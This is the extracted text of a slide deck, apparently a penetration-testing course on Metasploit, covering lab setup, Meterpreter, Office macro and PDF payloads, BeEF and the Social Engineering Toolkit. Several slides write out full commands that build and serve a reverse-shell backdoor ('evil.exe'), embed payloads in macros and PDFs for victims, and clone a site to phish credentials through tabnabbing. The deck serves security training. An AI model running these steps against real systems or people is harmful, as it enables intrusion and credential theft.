1. Penetration Testing with METASPLOIT http://www.insectechs.comhttp://www.insectechs.com Am Chaitanya Krishna. A

2. Course Introduction

3. Course Outline Introduction to Penetration Testing Setting up Penetration testing Lab Metasploit 101 Meterpreter Client side attacks Exploiting client side vulnerabilities Exploiting Browser based vulnerabilities Social Engineering Toolkit Armitage PowerSploit Post exploitation Writing custom meterpreter scripts

4. Introduction to PENETRATION TESTING

5. Introduction to Penetration Testing “Penetration testing a method of evaluating the security of a computer system or network by simulating an attack” Penetration tests are valuable for several reasons Determining the feasibility of a particular set of attack vectors Identifying higher-risk vulnerabilities which could lead to security breach Identifying vulnerabilities Testing the ability of network defenders Providing evidence to support increased investments in security personal and technology

6. PTES ( Penetration Testing Execution Standard) Aimed to provide security standards for business organizations and security service providers Laid standard for performing penetration test (Beta). Pre-engagement Interactions Pre-engagement Interactions Intelligence Gathering Intelligence Gathering Threat Modeling Threat Modeling Vulnerability Analysis Vulnerability Analysis Exploitation Exploitation Post Exploitation Post Exploitation Reporting Reporting Source : http://www.pentest-standard.org/ Penetration Testing Execution Methodology Penetration Testing Execution Standard

7. Mainly involves with client interaction Mainly involves with client interaction Engagement Interactions Engagement Interactions Agenda focuses on Penetration testing Road Map Agenda focuses on Penetration testing Road Map Questionnaires Questionnaires Payment Terms Payment Terms Pre-Engagement Interactions

8. Main attribute is reconnaissance( Information Gathering ) in Penetration Test Main attribute is reconnaissance( Information Gathering ) in Penetration Test Reflects other stages of Penetration Testing Reflects other stages of Penetration Testing Different tools and scripts will be used for different platforms for Information Gathering Different tools and scripts will be used for different platforms for Information Gathering Intelligence Gathering

9. Depends on Intelligence gathered information and the pre-engagement information Methodology Business Asset Analysis Business Process Analysis Threat Agents/Community Analysis Threat Capability Analysis Motivation Modeling Finding relevant news of comparable Organizations being compromised Threat Modeling

10. Involves in discovering flaws in target system Involves in discovering flaws in target system Different tools and scripts will be used for performing vulnerability analysis on different platforms Different tools and scripts will be used for performing vulnerability analysis on different platforms Threat level classification need to be created for exploitation phase Threat level classification need to be created for exploitation phase Priority should be given for threat level, need to analyze and exploit threats Priority should be given for threat level, need to analyze and exploit threats Directly reflects in exploitation phase Directly reflects in exploitation phase Vulnerability Analysis

11. Completely depends on vulnerability analysis phase & mainly focus on target exploitation. Exploits target with appropriate exploit & with compatibility check Pentester need to evade security systems, need to bypass and trigger the exploit for successful exploitation ExploitationExploitation

12. Involves extending attack Pen-tester can analyze further information during post exploitation Might include juicy information Using post exploitation phase attacker can enhance his persistency over the compromised system Post Exploitation

13. Consists of Penetration testing executive summary and technical report. Executive summary mainly focuses on threat level severity, general findings, recommendation summary and road map Technical report carries out how vulnerability analysis, exploitation and post exploitation has done Based on reporting technical team can further move towards patch management. ReportingReporting

14. Setting up PENETRATION TESTING Lab

15. Will be focusing on creation of our own virtual test beds & third party one’s Will be focusing on creation of our own virtual test beds & third party one’s Every Test Bed is been added with multiple vulnerabilities Every Test Bed is been added with multiple vulnerabilities Everything will be on safe side (No Loss) Everything will be on safe side (No Loss) Running with different set of operating systems with different set of configurations with added vulnerabilities Running with different set of operating systems with different set of configurations with added vulnerabilities Setting up Penetration Lab

16. Lab Setup Overview

17. Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network resources. --Wikipedia Virtualization software (Virtuabox, Vmware, Hypervisior) RAM(Minimum 4GB) Virtual Test beds or Operating system’s installer iso images Good processer above 2.8GHz VirtualizationVirtualization

18. The main operating system which got installed in a computer system Any operating system which got installed by using virtualization software Saving state of a virtual machine Copy state of a virtual machine Buzz Words

19. Installing and Setting up Virtual Lab

20. Snapshot and Cloning

21. METASPLOIT 101

22. Introduces Metasploit Framework Introduces Metasploit Framework Buzzwords, Architecture, Framework Architecture, Interfaces and Modules Buzzwords, Architecture, Framework Architecture, Interfaces and Modules Scope for exploiting target vulnerability using in built exploits and payloads Scope for exploiting target vulnerability using in built exploits and payloads Metasploit 101

23. Weakness existed in a system which could be compromised. Code which works on the target vulnerability system. Actual Code that lets an attacker to gain access after exploitation

24. Used for Penetration Testing IDS signature development Exploit Development Buzzing word security community Widely used Tool for Development and Testing Vulnerabilities Penetration Testing using Metasploit

25. Widely accepted tool for the Testing vulnerabilities Makes complex tasks more ease Posses rich set of modules organized in systematic manner Has Regular updates Contains different types 1000 + exploits, 200 + Payloads, 500+ Auxiliary Modules Why we need Opt Metasploit

26. TOOLS PLUGINS REX MSFCORE MSF BASE PAYLOADS EXPLOITS ENCODERS POST-Mods Auxiliary LibrariesInterfaces Console CLI WEB GUI Armitage Modules Metasploit Architecture

27. Actual code which works on the target vulnerability system. MSF has modular organization of exploits based on OS and service classification 1.ManualRanking 2.LowRanking 3.AverageRanking 4.NormalRanking 5.GoodRanking 6.GreatRanking 7.ExcellentRanking Exploit Ranking Values Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking ExploitsExploits

29. 1.ManualRanking : Exploit is so unstable or difficult to exploit and is basically a DoS 2.LowRanking : Exploit is nearly impossible to exploit (or under 50%) for common platforms 3.AverageRanking : Exploit is generally unreliable or difficult to exploit, then AverageRanking should be used 4.NormalRanking : Exploit is otherwise reliable, but depends on a specific version and can't reliably auto-detect auto-detect 5.GoodRanking : Exploit has a default target and it is the "common case" for this type of software 6.GreatRanking : Exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check 7.ExcellentRanking: Exploit will never crash the service Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking Exploits Ranking

30. Payloads Stagers Stages Singles Self contained ones does specific taskBridges connection Establishmentpayload components that are downloaded by Stagers modules PayloadsPayloads

32. Critical component of penetration test. Assist pen tester to gather information about exploited system. Enhance attack in the targeted environment Can be extended in pivoting stage MSF has inbuilt and external scripts to perform Post Exploitation Varied for Different OS types Post Exploitation

34. MSF Auxiliary contains wide variety modules related to different services used for doing specific tasks Auxiliary Modules admincrawlersscannersfuzzers sniffers.... Example : Scanning for available directories existed in webserver Auxiliary Modules

36. MSF contains inbuilt and third party tools for which are widely used during regular Pentests during runtime Importing Nessus scan report, later which can be used for launching attack based on report Inbuilt MSF tools comes handy especially during post exploitation phase Ex: memdump MSF Tools and Plugins

37. MSF Tools

38. MSF Plugins

39. MSF Interfaces

40. Present Scenario

41. If exploit and payload gets executed

42. Meterpreter

43. MeterpreterMeterpreter

44. Its a default Goto Payload for Windows Provides Enhanced Command Shell for the attacker Consists of default set of core commands Can be extended at runtime by shipping DLLs on the Victim machine Meterpreter > Provides basic post-exploitation API MeterpreterMeterpreter

45. Getting a Meterpreter shell undergoes 3 different stages sends exploit + Stage 1 Payload sends DLL injection payload Meterpreter DLL starts communication Working of Meterpreter

46. Meterpreter basics Core Commands File System Commands Networking Commands System Commands User Interface Commands Covers usage of Meterpreter Working with Meterpreter

47. Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST= 192.168.206.159 LPORT=44444 X >/var/www/evil.exe root@kali:# apachectl start Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.206.159 msf > set LPORT 44444 msf > exploit Launching Attack

48. Present Scenario

49. If exploit and payload gets executed

50. Core Commands

51. File System Commands

52. Networking Commands

53. System Commands

54. User Interface Commands

55. Client Side Attacks

57. Targets on exploitation of client side vulnerabilities Crack perimeter from the client side work environment EmailJava Office suite 3rd party applications Browsers Includes : Whole agenda focus on client side exploitation :Client side software's Exploiting Vulnerable services Exploiting Vulnerable services Exposed to Hostile Servers Exposed to Hostile Servers Introduction to Client Side Attacks

58. Contains different set of Operating systems Preconfigured and added vulnerabilities Scenario based Different stages Different stages Security levels Security levels Goal is to Pwn Goal is to Pwn Lab Environment

59. Exploiting : Software based vulnerabilities Software based vulnerabilities Web based vulnerabilities Web based vulnerabilities Browser based vulnerabilities Browser based vulnerabilities AgendaAgenda

60. Introduction to Client Side Attacks

61. Stage -1

62. Attacker creates a Backdoor and deploys on unprotected system, where Anti Virus : Absent Updates : Absent Firewall : Absent Stage -1

63. Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe root@kali:# apachectl start Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.206.159 msf > set LPORT 44444 msf > exploit Stage -1

64. Time for Demo Attacker Victim

65. Exploiting Client Side Vulnerabilities

66. Introduction to MSF Payloads Introduction to MSF Payloads Msfpayload, Msfencode, Msfvenom Msfpayload, Msfencode, Msfvenom Introduction to Binary payloads Introduction to Binary payloads Creating custom Binary payload types Creating custom Binary payload types File Format Exploits File Format Exploits Encoding payloads into VBA code Encoding payloads into VBA code Exploiting MS-Office suite programs using custom macros Exploiting MS-Office suite programs using custom macros Exploiting word and PDF documents Exploiting word and PDF documents Introduction to veil frame work Introduction to veil frame work Analyzing custom Binary payloads using Veil framework Analyzing custom Binary payloads using Veil framework Porting exploits and exploiting client side vulnerabilities Porting exploits and exploiting client side vulnerabilities Making persistent backdoors Making persistent backdoors Exploiting Client-Side Vulnerabilities

67. MSF contains different payloads with different set of options Inbuilt with custom set of commands Everything depends on payload suppleness Focus on Exploit development and Exploitation on different OS platforms depending on vulnerability existence. Introduction to MSF Payloads

68. Msfpayload module is used for creating custom executables, shellcode generation in different formats. Shellcode generated by msfpayload contains null characters, shellcode which is deployed or else passing in a network Might lead to AV / IDS & IPS detection. Msfencode module helps in avoid of bad characters. Msfpayload, Msfencode, Msfvenom

69. Developed by using msfpayload Requires bit of social engineering Attacker need to create an exe file and send it to victim machine On attacker side listener should be enable When ever victim opens up exe connection gets establishes Binary Payload

70. Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe root@kali:# apachectl start Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.206.159 msf > set LPORT 44444 msf > exploit DEMODEMO

71. Users desktop environment contains various software applications and networking services Might contain outdated application or poorly configured security services Client side exploitation can be easily done by using any one of the following : EmailJava Office suite 3rd party applications Browsers Exploiting File Format Vulnerabilities

72. Exploiting MS-Office Suite Programs

73. Stage : 1 Creating shellcode + payload msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.168.159.132 lport= 443 -e shikata_ga_nai -i 5 -f vba > vba.txt Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.159.132 msf > set LPORT 443 msf > exploit Shellcode execution in MS-Office Macros

74. Exploiting PDF Documents

75. Msf>use exploit/windows/fileformat/adobe_pdf_embedded_exe Msf>set payload windows/meterpreter/reverse_tcp Msf>set LHOST 192.168.159.132 Msf>set LPORT 4444 Msf>set INFILENAME /root/password.pdf SHARE THE PDF FILE WITH VICTIM Msf>use exploit/multi/handler Msf>set payload windows/meterpreter/reverse_tcp Msf>set LHOST 192.168.159.132 Msf>set LPORT 4444 Msf>exploit Exploiting PDF Documents

76. Exploiting Software Based Vulnerabilities

77. Introduction to software based vulnerabilities Introduction to software based vulnerabilities Analyzing how to exploit fully patched system Analyzing how to exploit fully patched system Analyzing and exploiting software vulnerabilities Analyzing and exploiting software vulnerabilities Exploiting Software based Vulnerabilities

78. Targets on exploitation of client side vulnerabilities Crack perimeter from the client side work environment Whole agenda focus on client side exploitation :Client side software's Exploiting Vulnerable services Exploiting Vulnerable services http://www.exploit-db.com/ Source : Introduction to software based vulnerabilities

79. Analyzing how to exploit fully patched machine

80. Lets check for any vulnerable service running on the victims machine We will exploit core software based vulnerabilities Analyzing how to exploit fully patched machine

82. Victim Environment

83. Analyzing and Exploiting Vulnerability

85. Exploiting Browser Based Vulnerabilities

86. Introduction to browser based vulnerabilities Introduction to browser based vulnerabilities Exploiting browser based vulnerabilities using Metasploit Exploiting browser based vulnerabilities using Metasploit Introduction to Browser Exploitation Framework (BeEF) Introduction to Browser Exploitation Framework (BeEF) Installing and Configuring Beef on attacker machine Installing and Configuring Beef on attacker machine Exploiting browser based vulnerabilities using BeEF Exploiting browser based vulnerabilities using BeEF Exploiting Browser based Vulnerabilities

87. A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to breach browser security to alter a user's browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code. -- Wikipedia Introduction to Browser Attacks

88. User environment might be running with outdated browser User environment might be running with outdated browser Victim need to browser attackers shared url Victim need to browser attackers shared url Once the victim navigates attacker Url victims machine will gets exploited and connection establishment takes place Once the victim navigates attacker Url victims machine will gets exploited and connection establishment takes place Exploitation Browser Vulnerabilities using MSF

93. Open source tool for testing and exploiting web application and browser-based vulnerabilities Testing and exploitation will be done from client side Features BeEF's modular framework allows addition of custom browser exploitation commands. The extension API allows users to change BeEF's core behavior. Keystroke logging Browser proxying Integration with Metasploit Plugin detection Intranet service exploitation Phonegap modules Hooking through QR codes Social Engineering modules spur user response such as entering sensitive data and responding to reminders to update software Restful API allows control of BeEF through http requests (JSON format). Source: http://en.wikipedia.org/wiki/BeEF Browser Exploitation Framework (BeEF)

94. © BeEF Project Browser Exploitation Framework (BeEF) Architecture

95. Installation root@kali: apt-get update root@kali: apt-get install beef-xss Configuring Edit config.yaml & set Metasploit : true vi /usr/share/beef-xss/config.yaml vi /usr/share/beef-xss/extensions/metasploit/config.yaml Add kali linux IP at line 18 and 26 host: "192.168.159.132" callback_host: "192.168.159.132" Add msf framework path at line 37 {os: 'custom', path: '/usr/share/metasploit-framework/'} Launching msf> load msgrpc ServerHost=192.168.159.132 Pass=abc123 root@kali: cd /usr/share/beef-xss/ root@kali: /usr/share/Metasploit-framework/./beef Installing and Configuring BeEF

96. beef

98. Time for Demo

99. Social Engineering Toolkit S.E.T. Social Engineering Toolkit S.E.T.

100. Introduction to social engineering Introduction to social engineering Introduction to SET Introduction to SET Installing and Configuring Social Engineering Toolkit Installing and Configuring Social Engineering Toolkit Working on SET modules and Launching Attacks using SET Working on SET modules and Launching Attacks using SET Social Engineering Toolkit

101. Kevin Mitnick Social Engineering

102. Self Interest Revenge Curiosity Mr.X, receiving pressure from friends, family or organized crime syndicates for reasons such as financial gain, self-interest and/or revenge Mr.X, want to access and/or modify information that is associated with a family member, colleague or even a neighbor. Mr.X, target a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance MotivationMotivation

103. People want to be helpful People want to avoid confrontation People like convenience People are messy People are curious. People appeal to the senses. Sometimes the help goes too far and they give away too much information. It's difficult for some people to ask others to prove who they are. They don't want confrontation. No one wants to be put out by additional security even though it may benefit the organization. By nature, they leave paper around, copy multiple people on e-mail, and leak data. A great example is an employee who finds a USB drive in the parking lot. The first thing they do when they get to their desk is plug it in to see what's on it. Building relationship with sweet voice. The Root Cause

104. Life Cycle of Social Engineering Life Cycle of Social Engineering

105. Social-Engineer Toolkit (SET) created and written by the founder of TrustedSec, Dave Kennedy Focuses exploiting human weakness Interfaces : Command line Web Introduction to SET

106. Introduction to Command-line Interface

107. Introduction to Web Interface

108. Tabnabbing Attack Performing Tabnabbing attack using SET Working on SET modules & launching attacks using SET

109. "It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security. It's like being hit by the wrong end of the sword.” Aza Raskin http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ Introduction to Tabnabbing

110. Attacker user customized scripts and hosting service to pretend it as a original page. How to do it Index1.html Index2.html Tabnab.js Hosting site Index-2.html Script.php Log.txt script.php Log.txt Index-1.html Script.js Behind Curtains

111. root@kali:/cd /usr/share/set/ root@kali:/usr/share/set/./settoolkit 1.Social Engineering Attacks 2.website Attack vectors 4. Tabnabbing Enter Attackers IP Enter Attackers IP 2. Site Cloner Enter the url to clone Victim should open attackers url and need to switch to new tab. What ever the tab opened in back will get refreshed and loads Phishing page. If victim supplies credentials over there it will post back to Attackers machine Tabnabbing using SET

115. Captured Credentials

116. ArmitageArmitage

117. Introduction to Armitage Introduction to Armitage Installing and configuring Armitage Installing and configuring Armitage Host Management Host Management Dynamic Workspaces Dynamic Workspaces Importing Hosts Importing Hosts Scanning and exploiting targets Scanning and exploiting targets Exploit Automation Exploit Automation ArmitageArmitage

118. root@kali: service postgresql start root@kali: service metasploit start root@kali: armitage GUI front-end for the Metasploit Framework developed by Raphael Mudge Kali Linux ships with inbuilt armitage and all the dependencies. Introduction to Armitage

119. Launching Armitage

122. Armitage UI

123. Adding Host

125. Scanning Host

126. Finding Attacks

129. Launching Attack

131. Compromised System

132. Thank You Thank You www.insectechs.comwww.insectechs.com